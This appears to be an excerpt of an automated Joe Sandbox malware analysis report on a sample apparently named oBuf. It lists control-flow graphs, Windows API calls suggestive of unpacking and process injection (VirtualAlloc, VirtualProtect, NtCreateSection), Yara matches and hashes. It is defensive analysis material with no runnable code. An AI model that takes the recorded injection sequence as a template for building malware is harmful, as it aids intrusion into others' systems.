                                                                                                                            control_flow_graph 134 6a003c-6a0047 135 6a0049 134->135 136 6a004c-6a0263 call 6a0a3f call 6a0e0f call 6a0d90 VirtualAlloc 134->136 135->136 151 6a028b-6a0292 136->151 152 6a0265-6a0289 call 6a0a69 136->152 154 6a02a1-6a02b0 151->154 156 6a02ce-6a03c2 VirtualProtect call 6a0cce call 6a0ce7 152->156 154->156 157 6a02b2-6a02cc 154->157 163 6a03d1-6a03e0 156->163 157->154 164 6a0439-6a04b8 VirtualFree 163->164 165 6a03e2-6a0437 call 6a0ce7 163->165 167 6a04be-6a04cd 164->167 168 6a05f4-6a05fe 164->168 165->163 170 6a04d3-6a04dd 167->170 171 6a077f-6a0789 168->171 172 6a0604-6a060d 168->172 170->168 174 6a04e3-6a0505 170->174 175 6a078b-6a07a3 171->175 176 6a07a6-6a07b0 171->176 172->171 177 6a0613-6a0637 172->177 186 6a0517-6a0520 174->186 187 6a0507-6a0515 174->187 175->176 178 6a086e-6a08be LoadLibraryA 176->178 179 6a07b6-6a07cb 176->179 180 6a063e-6a0648 177->180 185 6a08c7-6a08f9 178->185 182 6a07d2-6a07d5 179->182 180->171 183 6a064e-6a065a 180->183 188 6a07d7-6a07e0 182->188 189 6a0824-6a0833 182->189 183->171 184 6a0660-6a066a 183->184 190 6a067a-6a0689 184->190 192 6a08fb-6a0901 185->192 193 6a0902-6a091d 185->193 194 6a0526-6a0547 186->194 187->194 195 6a07e2 188->195 196 6a07e4-6a0822 188->196 191 6a0839-6a083c 189->191 197 6a068f-6a06b2 190->197 198 6a0750-6a077a 190->198 191->178 199 6a083e-6a0847 191->199 192->193 200 6a054d-6a0550 194->200 195->189 196->182 203 6a06ef-6a06fc 197->203 204 6a06b4-6a06ed 197->204 198->180 205 6a084b-6a086c 199->205 206 6a0849 199->206 201 6a05e0-6a05ef 200->201 202 6a0556-6a056b 200->202 201->170 208 6a056f-6a057a 202->208 209 6a056d 202->209 210 6a074b 203->210 211 6a06fe-6a0748 203->211 204->203 205->191 206->178 212 6a059b-6a05bb 208->212 213 6a057c-6a0599 208->213 209->201 210->190 211->210 218 6a05bd-6a05db 212->218 213->218 218->200
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006A024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658776261.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: edfa6b35737d46774f892f9e838a511c53124eeea6e349ba935a860513cbf214
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: 0A526874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                                            • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658546479.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                            • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                                            • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                            • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 477 6a0e0f-6a0e24 SetErrorMode * 2 478 6a0e2b-6a0e2c 477->478 479 6a0e26 477->479 479->478
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,006A0223,?,?), ref: 006A0E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,006A0223,?,?), ref: 006A0E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658776261.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: a812bd8a4e5226da291cda7890492f087020d928e330f1a56def5d4e73e5cff5
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 90D0123114512877DB003A94DC09BCD7B1CDF09B62F008451FB0DD9180C770994046E5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                            • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                                            • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                            • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 537 9103b6-9103f0 call 9106c9 540 9103f2-910425 VirtualAlloc call 910443 537->540 541 91043e 537->541 543 91042a-91043c 540->543 541->541 543->541
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00910407
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1659047327.000000000090D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_90d000_oBuf.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction ID: 97708d7941fada322b6c62d89240ef80cd7844bc97acf1356afaf31142ecfb70
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: 58113F79A00208EFDB01DF98C985E98BBF5AF48751F058094F9489B361D371EA90DF90
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                            • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                                            • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                            • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                            • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                                            • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                            • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                            • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                                            • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                            • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                            • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                                                            • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                            • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                            • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                                            • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                            • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658546479.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                            • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                            • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                            • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658776261.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .$GetProcAddress.$l
                                                                                                                            • API String ID: 0-2784972518
                                                                                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                            • Instruction ID: 950ca7b9e5abbbfde5366c66b5014f758a29023b43122d8a2dbe4e0272f0e847
                                                                                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                            • Instruction Fuzzy Hash: 5B3137B6900609DFEB10DF99C880AAEBBF6FF49324F24504AD441A7311D771EA45CFA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                                            • Instruction ID: 1fe14f3d08a5ad6b2b8af3127fa4f425e7ffb0c359c280517f11db711c116789
                                                                                                                            • Opcode Fuzzy Hash: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                                            • Instruction Fuzzy Hash: 0A716C32400264DADB28EFBCC6CAE557370FB02F00B550BB6C5812F58ADB75B6198B96
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4b2d8a9e10ea34c66f2be851acd177ef02858804a0a42e4fa9a70c669c45491b
                                                                                                                            • Instruction ID: 00eee5220ca6749cd960501b77aa4278c773043ef3e1e8922619681b4c311c41
                                                                                                                            • Opcode Fuzzy Hash: 4b2d8a9e10ea34c66f2be851acd177ef02858804a0a42e4fa9a70c669c45491b
                                                                                                                            • Instruction Fuzzy Hash: DA318A6550C2C08FE7225F3444E56D97FA4EF1371270901EBC8E1AA6A2D63D9E47834E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1659047327.000000000090D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_90d000_oBuf.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                            • Instruction ID: 85c8ff51fdb7da4e970f5834e2251713a8ca58d39b0baf83898eefdd5dd043f9
                                                                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                            • Instruction Fuzzy Hash: 121170723401049FDB54DF55DC91FE673EAEB8D360B298065E904CB356D6B6EC81C760
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                                            • Instruction ID: e7a2f1e1f2d18035c496875c0c2bba996cc0d18765e75913e3c7fd8bcbe23822
                                                                                                                            • Opcode Fuzzy Hash: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                                            • Instruction Fuzzy Hash: CA11533600420ADFD715EE219A89AA9BB21FB45704B5400BADE562B0C2A2BD7123970B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                                            • Instruction ID: d9f06ca26037506423ecc87bc330270b3b45d0e2ffab50e6a8e269eb556b0e13
                                                                                                                            • Opcode Fuzzy Hash: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                                            • Instruction Fuzzy Hash: 7411533640820ADFD715EE21AA89AA6BB31FB45704F5400BBDE562B0C1E2BD7123D74B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                                            • Instruction ID: 8ab6e973ac2bde56534b905b9a6112487ad567182bc04a9cefd4a17b3c0f3d42
                                                                                                                            • Opcode Fuzzy Hash: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                                            • Instruction Fuzzy Hash: A6113636504206CFDB15DF20D9895A8B722FB45704B1400BACE522B0C1E37D7113D70B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                                            • Instruction ID: 10c1f8c9815bd1bae344db256f26ecf9b321a2c49f9f40fa9571263b21f216dd
                                                                                                                            • Opcode Fuzzy Hash: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                                            • Instruction Fuzzy Hash: 17113636404206CFD715DF10AA895A8B721BB55704B14007ACE521B0C1A3BD6113970B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                            • Instruction ID: f3401649f1529dc56ca8e0e6371485d35b9042d0b2056da4c8f47593e1f5965b
                                                                                                                            • Opcode Fuzzy Hash: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                            • Instruction Fuzzy Hash: 7701263644420ACFDB1AEF11E9896E8B732FB55704B5401BACE565B0C1E37D6113D70B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658523748.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                            • Instruction ID: ab8b863e00b9434e1dbf8970a3beebb42fa128e0550c32edf730788d57ebd560
                                                                                                                            • Opcode Fuzzy Hash: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                            • Instruction Fuzzy Hash: 1001263640434ACFCB16EF11E9895E4BB32BF45708B4801A6CE565B092E3793122D70B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658776261.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                            • Instruction ID: 9670c6dc6782615957e8167651f040a8d9d68a0a5bd5790f4f5c73451d1e142f
                                                                                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                            • Instruction Fuzzy Hash: 7E0184766016048FEB21EF64C804BEA33E6FF87315F4544A5D50697242E774AD418F90
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658546479.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2776817195-0
                                                                                                                            • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                            • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                                            • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                            • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.1658546479.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                                            • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                            • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                                            • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
